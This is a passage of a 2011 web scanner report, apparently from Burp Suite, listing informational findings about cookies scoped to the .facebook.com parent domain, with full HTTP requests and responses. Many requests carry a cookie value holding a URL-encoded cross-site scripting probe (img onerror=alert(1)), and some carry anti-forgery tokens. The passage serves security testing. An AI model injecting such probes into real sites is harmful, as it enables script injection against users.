Path:   /Loizza

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Loizza HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.69
Connection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 228078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.24. http://www.facebook.com/aim  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aim

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aim HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.37
Connection: close
Date: Thu, 05 May 2011 11:40:16 GMT
Content-Length: 170476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.25. http://www.facebook.com/ajax/intl/language_dialog.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.123
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 41058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.26. http://www.facebook.com/ajax/reg_birthday_help.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/reg_birthday_help.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/reg_birthday_help.php?__a=1&__d=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
X-SVN-Rev: 374220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 707
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.52.163.55
X-Cnection: close
Date: Thu, 05 May 2011 11:43:24 GMT

for (;;);{"__ar":1,"payload":{"secure":false,"title":{"__html":"Why do I need to provide my birthday?"},"className":"birthday_warning_popup","body":{"__html":"Facebook requires all users to provide th
...[SNIP]...

10.27. http://www.facebook.com/ajax/register/logging.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/register/logging.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ajax/register/logging.php?__a=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
Origin: http://www.facebook.com
X-SVN-Rev: 374220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613617025%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613618111%2C%22act%22%2C1304613617025%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fajax%2Freg_birthday_help.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C437%2C508%2C12%2C981%2C16%5D
Content-Length: 111

action=postload_focus&reg_instance=nozCTU1UnNH2U_CPdhUk4wOq&abtest_registration_group=1&fb_dtsg=yeP5w&lsd=zTWKd

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 34
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.52.198.51
X-Cnection: close
Date: Thu, 05 May 2011 11:43:30 GMT

for (;;);{"__ar":1,"payload":null}

10.28. http://www.facebook.com/aol  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aol

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aol HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.63
Connection: close
Date: Thu, 05 May 2011 11:40:09 GMT
Content-Length: 39885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.29. http://www.facebook.com/aolradio  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aolradio

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aolradio HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.33
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 34803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.30. http://www.facebook.com/badges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badges HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.119
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 0


10.31. http://www.facebook.com/burkerkink  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /burkerkink

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /burkerkink HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.63
Connection: close
Date: Thu, 05 May 2011 11:42:28 GMT
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.32. http://www.facebook.com/campaign/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 10:56:36 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 10:56:36 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.222.101
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 0


10.33. http://www.facebook.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.122
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.34. http://www.facebook.com/deedee.perez1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /deedee.perez1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deedee.perez1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.57
Connection: close
Date: Thu, 05 May 2011 11:42:21 GMT
Content-Length: 77523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.35. http://www.facebook.com/directory/pages/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.51
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.36. http://www.facebook.com/directory/people/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
